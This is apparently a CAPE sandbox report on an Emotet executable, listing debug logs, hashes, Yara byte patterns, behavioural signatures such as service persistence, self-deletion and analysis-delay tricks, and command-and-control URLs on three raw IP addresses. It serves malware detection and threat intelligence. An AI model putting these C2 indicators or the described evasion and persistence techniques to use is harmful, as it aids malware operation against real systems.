2019-12-03 05:51:41,963 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:41,963 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1272
2019-12-03 05:51:41,980 [root] DEBUG: GetHookCallerBase: thread 1924 (handle 0x0), return address 0x0052CA2A, allocation base 0x00520000.
2019-12-03 05:51:41,980 [root] DEBUG: set_caller_info: Adding region at 0x00A90000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:41,996 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:41,996 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:42,010 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:42,010 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:42,073 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1272_87354923512131432122019
2019-12-03 05:51:42,073 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:42,088 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00520000.
2019-12-03 05:51:42,088 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00520000
2019-12-03 05:51:42,088 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:42,088 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00520000.
2019-12-03 05:51:42,088 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:42,119 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1272_151840447812131432122019
2019-12-03 05:51:42,135 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x11a00.
2019-12-03 05:51:42,135 [root] DEBUG: DLL unloaded from 0x74870000.
2019-12-03 05:51:42,135 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:42,151 [root] DEBUG: DLL unloaded from 0x74C10000.
2019-12-03 05:51:42,151 [root] INFO: Notified of termination of process with pid 1272.
2019-12-03 05:51:51,230 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\crypt32 (0x11d000 bytes).
2019-12-03 05:51:51,230 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:51,262 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-12-03 05:51:51,278 [root] DEBUG: DLL loaded at 0x77130000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-12-03 05:51:51,292 [root] DEBUG: DLL loaded at 0x756C0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-12-03 05:51:51,309 [root] DEBUG: DLL loaded at 0x75FF0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-12-03 05:51:51,323 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\SysWOW64\userenv (0x17000 bytes).
2019-12-03 05:51:51,323 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\SysWOW64\wtsapi32 (0xd000 bytes).
2019-12-03 05:51:56,986 [root] DEBUG: DLL loaded at 0x745F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-12-03 05:51:57,065 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2019-12-03 05:51:57,081 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x76090000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x77830000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-12-03 05:51:57,095 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\SysWOW64\dnsapi (0x44000 bytes).
2019-12-03 05:51:57,111 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\SysWOW64\iphlpapi (0x1c000 bytes).
2019-12-03 05:51:57,111 [root] DEBUG: DLL loaded at 0x74AE0000: C:\Windows\SysWOW64\WINNSI (0x7000 bytes).
2019-12-03 05:51:57,128 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:51:57,128 [root] DEBUG: DLL loaded at 0x76080000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL loaded at 0x74A60000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-12-03 05:51:57,142 [root] DEBUG: DLL unloaded from 0x74A80000.
2019-12-03 05:51:57,174 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x74A60000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-12-03 05:51:57,190 [root] DEBUG: DLL unloaded from 0x74A60000.
2019-12-03 05:51:57,190 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E90000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E70000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x75150000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-12-03 05:51:57,206 [root] DEBUG: DLL loaded at 0x74E10000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x75140000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x74A30000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-12-03 05:51:57,220 [root] DEBUG: DLL loaded at 0x74A20000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-12-03 05:51:57,236 [root] DEBUG: DLL loaded at 0x749E0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-12-03 05:51:57,252 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-12-03 05:51:57,267 [root] DEBUG: DLL loaded at 0x74980000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-12-03 05:51:57,283 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL loaded at 0x74950000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-12-03 05:51:57,299 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-12-03 05:51:57,299 [root] DEBUG: DLL unloaded from 0x74950000.
2019-12-03 05:51:59,576 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:52:06,924 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x74980000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x758D0000.
2019-12-03 05:52:09,592 [root] DEBUG: DLL unloaded from 0x77130000.
2019-12-03 05:52:14,568 [root] DEBUG: DLL unloaded from 0x77230000.
2019-12-03 05:54:19,165 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-12-03 05:54:19,165 [root] INFO: Created shutdown mutex.
2019-12-03 05:54:20,210 [lib.api.process] INFO: Terminate event set for process 1676
2019-12-03 05:54:20,242 [root] DEBUG: Terminate Event: Attempting to dump process 1676
2019-12-03 05:54:20,242 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF270000.
2019-12-03 05:54:20,242 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:54:20,257 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF270000.
2019-12-03 05:54:20,319 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2019-12-03 05:54:23,283 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1676_18285120162354532122019
2019-12-03 05:54:23,283 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2baa00.
2019-12-03 05:54:23,283 [lib.api.process] INFO: Termination confirmed for process 1676
2019-12-03 05:54:23,283 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1676
2019-12-03 05:54:23,299 [root] INFO: Terminate event set for process 1676.
2019-12-03 05:54:23,299 [root] INFO: Terminating process 1676 before shutdown.
2019-12-03 05:54:23,299 [root] INFO: Waiting for process 1676 to exit.
2019-12-03 05:54:24,345 [lib.api.process] INFO: Terminate event set for process 912
2019-12-03 05:54:24,361 [root] DEBUG: Terminate Event: Attempting to dump process 912
2019-12-03 05:54:24,361 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:54:24,375 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:54:24,391 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:54:24,391 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:54:24,516 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\912_11958270482454532122019
2019-12-03 05:54:24,548 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:54:24,548 [lib.api.process] INFO: Termination confirmed for process 912
2019-12-03 05:54:24,548 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 912
2019-12-03 05:54:24,548 [root] INFO: Terminate event set for process 912.
2019-12-03 05:54:24,548 [root] INFO: Terminating process 912 before shutdown.
2019-12-03 05:54:24,548 [root] INFO: Waiting for process 912 to exit.
2019-12-03 05:54:25,548 [root] INFO: Shutting down package.
2019-12-03 05:54:25,549 [root] INFO: Stopping auxiliary modules.
2019-12-03 05:54:25,549 [root] INFO: Finishing auxiliary modules.
2019-12-03 05:54:25,552 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-12-03 05:54:25,553 [root] WARNING: File at path "C:\HBzTSUSYC\debugger" does not exist, skip.
2019-12-03 05:54:25,555 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-03 target-03 ESX 2019-12-03 05:50:31 2019-12-03 05:55:08

File Details

File Name nonmanual.exe
File Size 371397 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4a19c0efa79d514e9003f0fb5abfa93d
SHA1 87c3ebe34ff049e02b24305cf7b6df0dda502a3b
SHA256 d3717429ba31832577c8a24fe89a4be77aa9198f351fa5a2911c95b20c4e9e39
SHA512 d9dfba254ec7ac780e75126c317e559288b28dc8882bd8b5e1e12dae9fdc41c9a9f5db1be3a6fc8c24651aac01d5552678ddfb0e8b3a776d13fea37f6ba1a463
CRC32 42BA7649
Ssdeep 6144:uyojDQSFZbS+pzaSKSa0/fUnt0vJgk2TBsGhw2/K6786TEnCAIpi9MxipEl7BuHh:MDQSzDq0mTMbGW
TrID
  • 61.7% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 14.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 10.0% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1952 trigged the Yara rule 'Emotet'
Hit: PID 1272 trigged the Yara rule 'Emotet'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: nonmanual.exe, PID 1952
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
Performs HTTP requests potentially not found in PCAP.
url: 144.76.56.36:8080/add/walk/teapot/
url: 165.227.156.155:443/window/cookies/tpt/
url: 78.47.106.72:8080/taskbar/publish/tpt/
CAPE extracted potentially suspicious content
nonmanual.exe: Emotet Payload
nonmanual.exe: [{u'strings': [u'{ 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 40 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }', u'{ 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
nonmanual.exe: Emotet Payload
nonmanual.exe: [{u'strings': [u'{ 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 40 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }', u'{ 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
Drops a binary and executes it
binary: C:\Windows\SysWOW64\compontitle.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://165.227.156.155:443/window/cookies/tpt/
Performs some HTTP requests
url: http://165.227.156.155:443/window/cookies/tpt/
The binary contains an unknown PE section name indicative of packing
unknown section: name: /4, entropy: 1.96, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_8BYTES, raw_size: 0x00000400, virtual_size: 0x00000358
unknown section: name: /19, entropy: 6.10, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x0000da00, virtual_size: 0x0000d972
unknown section: name: /31, entropy: 4.67, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00002000, virtual_size: 0x00001ffc
unknown section: name: /45, entropy: 5.74, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00002200, virtual_size: 0x000020d5
unknown section: name: /57, entropy: 4.70, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_4BYTES, raw_size: 0x00000c00, virtual_size: 0x00000bc4
unknown section: name: /70, entropy: 4.28, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00000400, virtual_size: 0x0000031c
unknown section: name: /81, entropy: 3.51, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00001a00, virtual_size: 0x000019f2
unknown section: name: /92, entropy: 2.55, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES, raw_size: 0x00000800, virtual_size: 0x00000608
The binary likely contains encrypted or compressed data.
section: name: .data, entropy: 6.87, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES, raw_size: 0x00014200, virtual_size: 0x00014020
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\compontitle.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (464) called API GetSystemTimeAsFileTime 2533026 times
Installs itself for autorun at Windows startup
service name: compontitle
service path: "C:\Windows\SysWOW64\compontitle.exe"
Installs itself for autorun at Windows startup
service name: compontitle
service path: "C:\Windows\SysWOW64\compontitle.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\compontitle.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Screenshots


Hosts

Direct IP Country Name
Y 78.47.106.72 [VT] Germany
Y 165.227.156.155 [VT] Germany
Y 144.76.56.36 [VT] Germany

DNS

No domains contacted.


Summary

C:\
C:\Users\user\AppData\Local\Temp\nonmanual.exe
C:\Windows\SysWOW64\grphexa.exe
C:\Windows\
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\compontitle.exe
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\Windows
\??\MountPointManager
C:\Windows\SysWOW64
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\
C:\Windows\SysWOW64\compontitle.exe:Zone.Identifier
C:\Users\user\AppData\Local\Microsoft\Windows\Burn
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\nonmanual.exe
C:\Windows\SysWOW64\shell32.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Windows
C:\Users\user\AppData\Local\Temp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\SysWOW64\compontitle.exe
C:\Windows\SysWOW64\compontitle.exe
C:\Windows\SysWOW64\grphexa.exe
C:\Users\user\AppData\Local\Temp\nonmanual.exe
C:\Windows\SysWOW64\compontitle.exe:Zone.Identifier
HKEY_CURRENT_USER
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
